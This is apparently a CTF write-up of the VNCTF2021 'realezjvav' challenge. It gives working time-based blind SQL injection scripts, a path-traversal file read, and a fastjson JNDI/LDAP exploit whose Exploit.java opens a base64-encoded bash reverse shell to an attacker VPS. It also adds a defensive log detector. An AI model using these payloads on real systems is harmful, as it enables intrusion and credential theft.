VNCTF2021 realezjvav write-up (reproduction)
Vulnerabilities:
SQL injection
fastjson deserialization (learned something new, orz)
References
Official write-up
Red team arsenal: RCE exploit covering every fastjson vulnerability below 1.2.68
bfengj's write-up
Reproduction steps
The page hint (Only the admin can get the right page) and the source code point to SQL injection, and the username must be admin. A password of test' returns a 500 error while test' # returns 200, so the single quote lands inside the query. After some fuzzing and reading other players' write-ups, the approach is a time-based blind injection that uses a Cartesian product (a heavy self-join) as the delay.
Payload 1:
import requests
from time import sleep

url = "http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag = ""
for i in range(1, 100):
    # binary search over the printable ASCII range for character i of the password
    low = 32
    high = 128
    while 1:
        j = low + (high - low) // 2
        if j == low:
            flag += chr(j)
            print(flag)
            break
        # the three-way self-join of information_schema.tables is the heavy query:
        # when the condition holds the server stalls and the request times out
        payload = "-1'or if(ascii(substr(password,{},1))<{},(SELECT count(*) FROM information_schema.tables A,information_schema.tables B,information_schema.tables C),1)#".format(i, j)
        data = {
            'username': 'admin',
            'password': payload
        }
        try:
            r = requests.post(url=url, data=data, timeout=0.7)
            low = j    # answered quickly: ascii(char) >= j
        except:
            high = j   # timed out: ascii(char) < j
        sleep(0.4)
Payload 2:
import requests

url = "http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag = ''
for i in range(1, 50):
    f1 = flag
    top = 127
    low = 33
    while low <= top:
        mid = (top + low) // 2
        # first pass (kept for reference): enumerate the column names of table user
        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        # "=" probe: a timeout means character i is exactly mid
        p1 = "admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i, mid)
        # ">" probe: a timeout means character i is greater than mid
        p2 = "admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i, mid)
        data1 = {'username': 'admin', 'password': p1}
        data2 = {'username': 'admin', 'password': p2}
        try:
            print(i, mid)
            r1 = requests.post(url, data=data1, timeout=1)
        except requests.exceptions.ReadTimeout as e:
            flag += chr(mid)
            print(flag)
            break
        except Exception as e:
            pass  # any other error: retry the same mid
        else:
            try:
                r2 = requests.post(url, data=data2, timeout=1)
            except requests.exceptions.ReadTimeout as e:
                low = mid + 1
            except Exception as e:
                pass
            else:
                top = mid - 1
    if flag == f1:
        # no character was recovered in this round, so the string is complete
        break
Result: no_0ne_kn0w_th1s
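From the defender's side, the two scripts above leave a very recognisable trail: many login attempts from one client whose password field carries an if(ascii(substr(...))) probe and an information_schema.tables self-join, with response times split between fast and timed-out. The following detector is an added example, not part of the original write-up; the event format, IP addresses and response times are constructed.

```python
import re
from collections import defaultdict

# Signatures derived from the payloads in this write-up: the if(ascii(substr(...)))
# character probe, the information_schema.tables self-join used as the delay
# ("heavy query"), and /**/ standing in for whitespace.
SIGNATURES = {
    "char_probe": re.compile(r"if\s*\(\s*ascii\s*\(\s*substr\s*\(", re.I),
    "heavy_query": re.compile(r"from\s+information_schema\.tables\s+\w+\s*,"
                              r"\s*information_schema\.tables\s+\w+\s*,", re.I),
    "comment_whitespace": re.compile(r"/\*\*/"),
}

def match_signatures(password_field):
    """Names of the signatures found in a submitted password value."""
    folded = password_field.replace("/**/", " ")  # undo the comment-as-space trick
    return [name for name, rx in SIGNATURES.items()
            if rx.search(folded) or rx.search(password_field)]

def summarize_login_attempts(events, slow_seconds=0.7):
    """Per client IP: total attempts, attempts hitting a signature, and attempts
    that took at least slow_seconds (the timeout the scripts above key on).
    Each event is a constructed dict with keys ip, password and rt (seconds)."""
    summary = defaultdict(lambda: {"total": 0, "flagged": 0, "slow": 0})
    for ev in events:
        s = summary[ev["ip"]]
        s["total"] += 1
        if match_signatures(ev["password"]):
            s["flagged"] += 1
        if ev["rt"] >= slow_seconds:
            s["slow"] += 1
    return dict(summary)

# Constructed sample: both probe styles used above, plus one ordinary login.
SAMPLE_EVENTS = [
    {"ip": "198.51.100.7", "rt": 0.9,
     "password": "-1'or if(ascii(substr(password,1,1))<80,(SELECT count(*) FROM "
                 "information_schema.tables A,information_schema.tables B,"
                 "information_schema.tables C),1)#"},
    {"ip": "198.51.100.7", "rt": 0.05,
     "password": "admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)"
                 "/**/from/**/user),1,1))=110,1,0)/**/and/**/(SELECT/**/count(*)/**/FROM"
                 "/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,"
                 "information_schema.tables/**/C)#"},
    {"ip": "203.0.113.5", "rt": 0.03, "password": "correct horse battery"},
]

if __name__ == "__main__":
    for ip, s in summarize_login_attempts(SAMPLE_EVENTS).items():
        print(ip, s)
```

A client whose flagged count climbs while its responses alternate between fast and slow is running exactly the binary search shown above; the fix on the application side is a parameterised login query, which makes the quote in the password field inert.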

After logging in there is a "create character" feature, and the source code contains a file-reading endpoint, so I tried arbitrary file read, first on pom.xml:
/searchimage?img=…/…/…/…/…/pom.xml
Then I searched online for a payload.
Fastjson < 1.2.68
The published fastjson bypass works against every version below 1.2.68.
The details are explained in the first reference.
While reproducing, the rmi protocol never worked for me; following the write-up and switching to the ldap protocol, the command executed successfully.
Detailed steps:
First create Exploit.java
public class Exploit {
    public Exploit() {
        try {
            Runtime.getRuntime().exec(
                "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwL2lwLzg3NjUgMD4mMQ==}|{base64,-d}|{bash,-i}");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
Replace the base64 part with your own VPS address to receive the reverse shell; I used port 8765 here.
Run javac Exploit.java to produce Exploit.class
in the current directory.
Next, download marshalsec from GitHub:
marshalsec
Once downloaded, build it:
mvn clean package -DskipTests
Enter the target directory and start the LDAP server:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ip:8888/#Exploit" 9999
If that is too much hassle, try this one-click setup tool written by another player:
tool
On the server you only need
Final POST request payload
Use unicode escapes to bypass the filter
Reverse shell obtained